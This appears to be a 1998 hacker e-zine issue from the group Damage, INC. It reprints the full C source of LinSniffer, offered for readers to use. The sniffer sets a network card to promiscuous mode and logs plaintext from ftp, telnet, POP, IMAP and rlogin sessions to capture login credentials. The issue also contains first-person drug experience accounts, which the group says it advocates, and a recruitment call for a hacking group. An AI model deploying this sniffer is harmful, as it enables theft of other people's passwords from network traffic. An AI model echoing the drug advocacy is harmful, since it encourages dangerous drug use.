Bellcore Customer Service 60 New England Avenue, Room 1B252 Piscataway, NJ 08834-4196 (201) 699-5800 SOURCE AND SCRIPTS - {SOURCE} Linux Sniffer source code: In the spotlight this month we're featuring a Linux Sniffer. As you can see, it's not by Damage, INC. but hopefully in future issues there will be more source code that was written by us. The source hasn't been modified in any way, nor are we taking credit for this sniffer. We're simply including it so that you can use it, study the code and learn from it. ;) If you want some other sniffers, then check out some web sites that carry them. ------------------------------------------------------------------------------- /* LinSniffer 0.03 [BETA] Mike Edulla medulla@infosoc.com */ #include #include #include #include #include #include #include #include #include #include #include #include #include #include int openintf(char *); int read_tcp(int); int filter(void); int print_header(void); int print_data(int, char *); char *hostlookup(unsigned long int); void clear_victim(void); void cleanup(int); struct etherpacket { struct ethhdr eth; struct iphdr ip; struct tcphdr tcp; char buff[8192]; }ep; struct { unsigned long saddr; unsigned long daddr; unsigned short sport; unsigned short dport; int bytes_read; char active; time_t start_time; } victim; struct iphdr *ip; struct tcphdr *tcp; int s; FILE *fp; #define CAPTLEN 512 #define TIMEOUT 30 #define TCPLOG "tcp.log" int openintf(char *d) { int fd; struct ifreq ifr; int s; fd=socket(AF_INET, SOCK_PACKET, htons(0x800)); if(fd < 0) { perror("cant get SOCK_PACKET socket"); exit(0); } strcpy(ifr.ifr_name, d); s=ioctl(fd, SIOCGIFFLAGS, &ifr); if(s < 0) { close(fd); perror("cant get flags"); exit(0); } ifr.ifr_flags |= IFF_PROMISC; s=ioctl(fd, SIOCSIFFLAGS, &ifr); if(s < 0) perror("cant set promiscuous mode"); return fd; } int read_tcp(int s) { int x; while(1) { x=read(s, (struct etherpacket *)&ep, sizeof(ep)); if(x > 1) { if(filter()==0) continue; x=x-54; if(x < 1) continue; return x; } } } int filter(void) { int p; p=0; if(ip->protocol != 6) return 0; if(victim.active != 0) if(victim.bytes_read > CAPTLEN) { fprintf(fp, "\n----- [CAPLEN Exceeded]\n"); clear_victim(); return 0; } if(victim.active != 0) if(time(NULL) > (victim.start_time + TIMEOUT)) { fprintf(fp, "\n----- [Timed Out]\n"); clear_victim(); return 0; } if(ntohs(tcp->dest)==21) p=1; /* ftp */ if(ntohs(tcp->dest)==23) p=1; /* telnet */ if(ntohs(tcp->dest)==110) p=1; /* pop3 */ if(ntohs(tcp->dest)==109) p=1; /* pop2 */ if(ntohs(tcp->dest)==143) p=1; /* imap2 */ if(ntohs(tcp->dest)==513) p=1; /* rlogin */ if(ntohs(tcp->dest)==106) p=1; /* poppasswd */ if(victim.active == 0) if(p == 1) if(tcp->syn == 1) { victim.saddr=ip->saddr; victim.daddr=ip->daddr; victim.active=1; victim.sport=tcp->source; victim.dport=tcp->dest; victim.bytes_read=0; victim.start_time=time(NULL); print_header(); } if(tcp->dest != victim.dport) return 0; if(tcp->source != victim.sport) return 0; if(ip->saddr != victim.saddr) return 0; if(ip->daddr != victim.daddr) return 0; if(tcp->rst == 1) { victim.active=0; alarm(0); fprintf(fp, "\n----- [RST]\n"); clear_victim(); return 0; } if(tcp->fin == 1) { victim.active=0; alarm(0); fprintf(fp, "\n----- [FIN]\n"); clear_victim(); return 0; } return 1; } int print_header(void) { fprintf(fp, "\n"); fprintf(fp, "%s => ", hostlookup(ip->saddr)); fprintf(fp, "%s [%d]\n", hostlookup(ip->daddr), ntohs(tcp->dest)); } int print_data(int datalen, char *data) { int i=0; int t=0; victim.bytes_read=victim.bytes_read+datalen; for(i=0;i != datalen;i++) { if(data[i] == 13) { fprintf(fp, "\n"); t=0; } if(isprint(data[i])) {fprintf(fp, "%c", data[i]);t++;} if(t > 75) {t=0;fprintf(fp, "\n");} } } main(int argc, char **argv) { s=openintf("eth0"); ip=(struct iphdr *)(((unsigned long)&ep.ip)-2); tcp=(struct tcphdr *)(((unsigned long)&ep.tcp)-2); signal(SIGHUP, SIG_IGN); signal(SIGINT, cleanup); signal(SIGTERM, cleanup); signal(SIGKILL, cleanup); signal(SIGQUIT, cleanup); if(argc == 2) fp=stdout; else fp=fopen(TCPLOG, "at"); if(fp == NULL) { fprintf(stderr, "cant open log\n");exit(0);} clear_victim(); for(;;) { read_tcp(s); if(victim.active != 0) print_data(htons(ip->tot_len)-sizeof(ep.ip)-sizeof(ep.tcp), ep.buff-2); fflush(fp); } } char *hostlookup(unsigned long int in) { static char blah[1024]; struct in_addr i; struct hostent *he; i.s_addr=in; he=gethostbyaddr((char *)&i, sizeof(struct in_addr),AF_INET); if(he == NULL) strcpy(blah, inet_ntoa(i)); else strcpy(blah, he->h_name); return blah; } void clear_victim(void) { victim.saddr=0; victim.daddr=0; victim.sport=0; victim.dport=0; victim.active=0; victim.bytes_read=0; victim.start_time=0; } void cleanup(int sig) { fprintf(fp, "Exiting...\n"); close(s); fclose(fp); exit(0); } ------------------------------------------------------------------------------- THE JOURNALIST'S TOP TEN LIST - {TOP TEN} "Drugs and their effects" 1. MARIJUANA Names: Cannabis, grass, pot, dope, weed, ganja, bud, green, maryjane. "The first few times I did pot were awesome! Me and my buddy made this huge pipe out of 3 one-litre pop bottles. We would smoke two bowls and be absolutely fucked! We used to laugh for three hours straight, at everything and anything. One time we lay on his bed and listened to stairway to heaven. Music had never sounded so good that night; I felt like my body was becoming one with the bed. Those were times that I'll never ever forget, no matter how much pot I smoke. ;)" 2. L.S.D Names: LSD, hits, acid, blotter, burgers, paper, trips, candy. "It was the first time I had done acid. Looking back, this shit was definitely the cleanest and purest stuff I've ever done. A friend and I took one hit each. There were cartoon characters on the back of the hits. After half an hour I was rushing from head to toe. Two hours later I was so fucked I couldn't remember my own name. I do remember playing with the kitchen knife, wanting to see my own blood. The comedown was also one of the best I have ever experienced. We talked about life, and philosophy. My mind was very expanded at that moment. I felt a peace and calmness within me that I have only experienced two other times; but that's another story." 3. HEROIN Names: Heroin, junk, smack, dope, "They said the heroin rush was better than an orgasm. I just had to know for myself. The thought of using a hypodermic needle kinda scared me, but I had snorted coke before, so was not too scared to do a little heroin. A few seconds after I plunged the warm liquid into my bloodstream I felt a wave of ecstasy explode in my body. I was in heaven. Nothing mattered on junk. Bliss had been attained, why strive for anything else? I enjoyed my experience with heroin. I don't think I'll ever do it again. I liked it too much, I would probably end up a junkie dying of AIDS or something." 4. MDMA Names: MDMA, ecstasy, 'e', adam, eve, xtc. "I prefer to do E at raves personally. It's just a much better atmosphere for the drug. E keeps me going all night, which is nice. It never fucks me up too much, which is also nice. I can still talk to people and make sense. That's one of the reasons I do E at raves. There is a vibe of friendliness, openness and love. E makes me feel alright about the world. I like the connected feeling I get when I do E." 5. COCAINE Names: Cocaine, coke, cola, white god, blow. "The first time I did coke I snorted it. We had gotten it from a reliable source, so I didn't hesitate. I rolled up a crisp new twenty and inserted one end into my nostril. I covered the other nostril and snorted the first rail. I switched nostrils and snorted back the second line. I immediately felt a rush of exhiliration pulse through my body. My heart was racing, and I felt invincible. I lit a cigarette and took a few puffs. At this point I heard a ringing in my ears. It got progressively louder until I felt like a locomotion was thundering through my head. Coke is fucking crazy like that. Its as if you're on the edge of the world, looking out into the abyss." 6. PCP Names: PCP, Angel Dust. "I've heard crazy things about PCP; things like people cutting their own limbs off, or killing their wife and filleting her. Still, that did not deter me from saying yes when my friend came back saying 'no acid, but I got PCP'. My friend snorted his. I ate a bit, and laced the rest in a joint with weed. I didn't get as fucked up as I expected but nevertheless, things were pretty wierd. Fortunately I still have two arms and two legs. ;) I doubt I'll do PCP again." 7. DMT Names: DMT. Method of ingestion: Inhalation of DMT vapours. "...Suddenly everything melts away. I am left floating in nothingness. In front of me little sets of eyes pop out of the darkness. These are followed by distorted voices, communicating some unknown language. Images of alternate beings flood my vision. Colors spew out from geometric shapes twisting and morphing into a million different structures. I feel myself being pulled forward, through the magnificent hallucinations that bombard my reality. I have arrived on another planet. I have travelled the universe in my mind." 8. PEYOTE Names: Peyote, cactus. "Doing peyote was inevitable for me. I had been studying native Mexican culture for many years, and knew a lot about the ancient rituals involving the sacred cactus. The cactus was mashed up and mixed into a brew with many other natural plants, which help smooth the trip, and lessen negative somatic effects. It was the perfect set and setting for the trip. I sat around the fire and discussed anthropology with my acquaintances. The stars danced in the clear night sky. It was a very pleasurable experience, except for the mild nausea I felt while digesting the mixture." 9. NITROUS OXIDE Names: Nitrous oxide, laughing gas, n2o, whippets. "Nitrous is for kicks. It totally knocks you in the ass if you take some while peaking out on another drug. Sometimes people will sell in balloons, but most of the time you either use whipped cream canisters, or buy it in a tank. Its more of a kid's drug, but it's fun every now and then... if you want to have a 2-minute high." 10. PSILOCYBIN Names: Psilocybin, mushrooms, shrooms, mushies. "I've done shrooms quite a few times, and one thing I can say is that the effects were always different. At first I used to get major aural distortions and hallucinations, combined with spontaneous laughing. Other times I'd be really happy, and body-buzzed. But the most incredible experience I ever had was on three and a half grams of the dried mushroom. While peaking my friend and I attained the level of consciousness that is usually reserved only for meditating buddhas. I felt very calm, and at one with the universe." The above events are real accounts from various people, and they reflect their own personal drug experiences and not necessarily those of The Journalist. It is your choice whether or not you want to experiment with drugs. Even though Damage, INC. condones and advocates their usage, we are not responsible for *your* actions. If you choose to try any of the drugs mentioned, then that decision is your own to make. Our intention isn't to influence our readers, only to inform and educate them. We're not telling you to do drugs, nor are we condemning them. We are simply sharing some unique experiences with you. In order to make an informed decision, you require information on the topic. That's exactly what we are providing you with. Read it, digest it and think about it. Written by The Journalist � Damage, INC. (C)opyright 1998. THOUGHTS, POEMS AND CREATIVE WRITING - {WRITING} Weakness and Strength: Rumours, Misinformation, Assumptions, Fiction, Stories, Misconceptions, Stereotypes, Falsehoods, Hearsay, Myths, Legends, Propaganda, Exaggeration, Wrongs, Naive, Gullible, Influenced, Followers, Witchhunts, Disinformation, Ignorance, Unreal, Brainwashed, Fake, Weak, Stupid, Zombies...Government, Big Brother, Lies. Facts, Information, Informed, Confirmed, Non-Fictional, Proven, Correct, Accurate, Precise, Enlightened, Evolved, Truths, Direct, Honest, Knowledge, Freedom, Liberty, Real, Strong, Powerful, Wise, Revolutionaries...Anarchy, Damage, INC., Truth. Written by BLACKENED � Damage, INC. (C)opyright 1998. CLOSING COMMENTS - {CLOSING} Shatazar's Inaugural Closing Comments: I have been given the honour of closing another quality issue of the Damage, INC. Newsletter. As always, it is our intent to provide our readers with interesting and useful information that the mass media will not. The quote for this issue, "We keep you honest" is what we have been doing since the beginning. ;-) We work hard to make sure that all the information we present to you is accurate and truthful. As we have stated many times, it is up to you to form your own opinions. By the way, thinking to yourself "I disagree" or "I don't believe it" doesn't benefit anyone, including yourself. That is because the truth is not revealed by such thoughts. They must be acted upon. Do your own research and report your findings to us. That is why the REPORTS FROM THE FRONT section of the Damage, INC. Newsletter exists. Also, while searching for the truth, if you discover something of great interest send the information to us. If it is quality, we'll be pleased to share it with the rest of our loyal readers. That way everyone is thinking and striving to eliminate the fog of misinformation that Big Brother and the mass media creates on a daily basis. We're always looking for Writers, Members and Distribution Sites. If you'd like to apply to Damage, INC. and join a respected h/p group, then download a copy of the Damage, INC. Application Generator. If you want any of our releases, they are currently available (at no ratio) on the following boards: ...AND JUSTICE FOR ALL - Damage, INC. WHQ, h/p/a/c/v/t, no ratios, invite only. Freedom of Information Archives - Damage, INC. Dist. Site, h/p/a/c/v/t. Distraught Continuum - h/p/a/c/v/t, programming, etc. Any feedback or letters to the editor should be sent to BLACKENED in Email on a Damage, INC. board near you. He can also be contacted via Echomail/Netmail in several nets. - EOF